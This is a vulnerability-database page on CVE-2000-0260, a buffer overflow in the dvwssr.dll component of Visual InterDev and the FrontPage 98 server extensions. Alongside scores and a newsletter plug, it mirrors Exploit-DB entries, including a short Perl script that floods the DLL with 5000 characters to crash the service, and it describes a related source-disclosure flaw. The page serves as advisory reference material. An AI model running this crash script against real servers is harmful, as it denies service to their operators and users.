CVE-2000-0260
published 2000-04-14CVE-2000-0260: Buffer overflow in the dvwssr.dll DLL in Microsoft Visual Interdev 1.0 allows users to cause a denial of service or execute commands, aka the "Link View…
PriorityP430high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
13.89%
96.1th percentile
Buffer overflow in the dvwssr.dll DLL in Microsoft Visual Interdev 1.0 allows users to cause a denial of service or execute commands, aka the "Link View Server-Side Component" vulnerability.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | visual_interdev | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft FrontPage 98 Server Extensions for IIS / Microsoft InterDev 1.0 - Remote Buffer Overflow
exploitdb·2000-04-14
CVE-2000-0260 Microsoft FrontPage 98 Server Extensions for IIS / Microsoft InterDev 1.0 - Remote Buffer Overflow
Microsoft FrontPage 98 Server Extensions for IIS / Microsoft InterDev 1.0 - Remote Buffer Overflow
---
source: https://www.securityfocus.com/bid/1109/info
The dvwssr.dll included with the FrontPage 98 extensions for IIS and shipped as part of the NT Option Pack has a remotely exploitable buffer overflow. This attack will result in the service no longer accepting connections and may allow for remote code execution on the vulnerable host.
#!/usr/bin/perl
print "GET /_vti_bin/_vti_aut/dvwssr.dll?";
print "a" x 5000;
print " HTTP/1.1\nHost: yourhost\n\n";
Exploit-DB
Microsoft FrontPage 98 Server Extensions for IIS / Microsoft InterDev 1.0 - Filename Obfuscation
exploitdb·2000-04-14
CVE-2000-0260 Microsoft FrontPage 98 Server Extensions for IIS / Microsoft InterDev 1.0 - Filename Obfuscation
Microsoft FrontPage 98 Server Extensions for IIS / Microsoft InterDev 1.0 - Filename Obfuscation
---
source: https://www.securityfocus.com/bid/1108/info
Two dlls (dvwssr.dll and mtd2lv.dll) included with the FrontPage 98 extensions for IIS and shipped as part of the NT Option Pack include an obfuscation string that manipulates the name of requested files. Knowing this string and the obfuscation algorithm allows anyone with web authoring privileges on the target host to download any .asp or .asa source on the system (including files outside the web root, through usage of the '../' string). This includes users with web authoring rights to only one of several virtual hosts on a system, allowing one company to potentially gain access to the source of another company's website if hosted on t
No writeups or analysis indexed.
2000-04-14
Published